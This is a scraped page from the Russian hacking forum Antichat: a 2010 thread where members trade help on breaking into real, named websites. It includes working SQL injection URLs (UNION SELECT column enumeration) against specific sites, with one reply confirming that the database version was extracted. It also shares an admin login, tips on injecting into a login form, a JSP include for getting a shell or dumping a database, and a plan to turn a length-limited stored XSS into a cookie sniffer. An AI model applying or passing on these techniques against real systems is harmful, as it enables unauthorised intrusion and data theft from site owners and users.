Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

08.01.2010, 16:38
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
не выводятся принтабельный столобец, перепробовал все....
Код:
http://lanpolis.ru/private/?act1=cat&s=NDg1MTFANDg5VkgwOGhnczVQSQ==&cid=-5+and+1=2+union+select+1,2,3,4,5--
П.С. Запрос из личного кабинета, паблег акк: admin;admin
П.П.С. можно в личку
|
|
|

08.01.2010, 19:51
|
|
Познающий
Регистрация: 27.08.2009
Сообщений: 33
Провел на форуме: 62823
Репутация:
0
|
|
Кто научит Sql injection? Уже и уязвимый скрипт написал ,но ни как не получается. Пожалуйста помогите дураку.  юин 3355805
|
|
|

08.01.2010, 22:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от 547
скуль инжекция...
ввожу в админке:
login:"
pass:'
выдает вот такую ошибку:
Unclosed quotation mark after the character string '') AND (admin_user.public_in = 1)'.
Incorrect syntax near '') AND (admin_user.public_in = 1)
так же пробовал вариацию типо:
login:%00'
password:something
Incorrect syntax near 'something'. Unclosed quotation mark after the character string ') AND (admin_user.public_in = 1)'.
как в таком случае провести инжекцию?
Как вариант попробуй найти скулю на сайте..
|
|
|

09.01.2010, 00:42
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
Провел на форуме: 1245844
Репутация:
199
|
|
Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?
|
|
|

09.01.2010, 01:10
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 3
Провел на форуме: 16367
Репутация:
1
|
|
Сообщение от Paul_Eckman
Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?
Flash работает на клиенте (на компе, а не на сервере). Если ты хочешь попытаться "забраться" на сервер, то можно:
- декомпилировать Flash или просто снять посылаемые запросы, чтоб посмотреть как коммуникация с сервером идет;
- и потом в зависимости от того, какой клиент (PHP, JSP, ASP) на сервере попытаться найти уязвимость, из-/подменяя параметры/данные передаваемые Flash-Client'ом.
|
|
|

09.01.2010, 01:22
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 3
Провел на форуме: 16367
Репутация:
1
|
|
JSP XSS взлом
У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь...
сайт: JSP (J2EE) (AJAX)
сервер: Apache Tomcat 5.0.28 с Coyote Connector
уязвимость: XSS, поле позволяет максимум 80 символов.
конечная цель: добраться до данных BD (dump)
пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные? *), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет.
какой самый оптимальный способ воспользоваться.
мои варианты:
1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было.
Код:
<jsp:include page="{HttpServletRequest().getParameter("xx")}" />
в хх подставил удаленный HTML. Чето не работает ((
Что посоветуете?
Update:
* Нашел неплохой JSP File Browser
http://www.vonloesch.de/jspbrowser.html
Последний раз редактировалось ccleverr; 09.01.2010 в 01:43..
|
|
|

09.01.2010, 16:00
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме: 282022
Репутация:
4
|
|
народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
|
|
|

09.01.2010, 16:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
Сообщение от Gidz
народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
|
|
|

09.01.2010, 16:23
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме: 282022
Репутация:
4
|
|
Сообщение от RulleR
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
ага выводит, а я на странице искал, сенкс 
|
|
|

09.01.2010, 18:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|